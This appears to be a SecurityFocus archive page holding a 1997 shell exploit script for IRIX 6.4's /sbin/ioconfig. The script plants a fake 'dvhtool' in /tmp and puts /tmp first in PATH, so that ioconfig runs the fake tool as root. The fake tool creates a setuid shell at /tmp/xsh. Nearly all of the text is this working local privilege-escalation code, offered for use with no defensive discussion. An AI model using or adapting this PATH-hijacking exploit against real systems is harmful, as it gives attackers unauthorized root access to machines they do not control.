IRIX ioconfig Vulnerability

#!/bin/sh
#
# Irix 6.4 ioconfig xploit - Loneguard 04/12/97
#
# Simple xploit making use of stupid system calls to programs without using
# a path. This works on both /sbin/ioconfig and /sbin/disk_bandwidth.
#
cat > /tmp/dvhtool << 'EOF'
#!/bin/sh
/sbin/cp /bin/csh /tmp/xsh
/sbin/chmod 14755 /tmp/xsh
EOF
/sbin/chmod 700 /tmp/dvhtool
PATH=/tmp:$PATH
/sbin/ioconfig -f /hw


 

Privacy Statement
Copyright 2010, SecurityFocus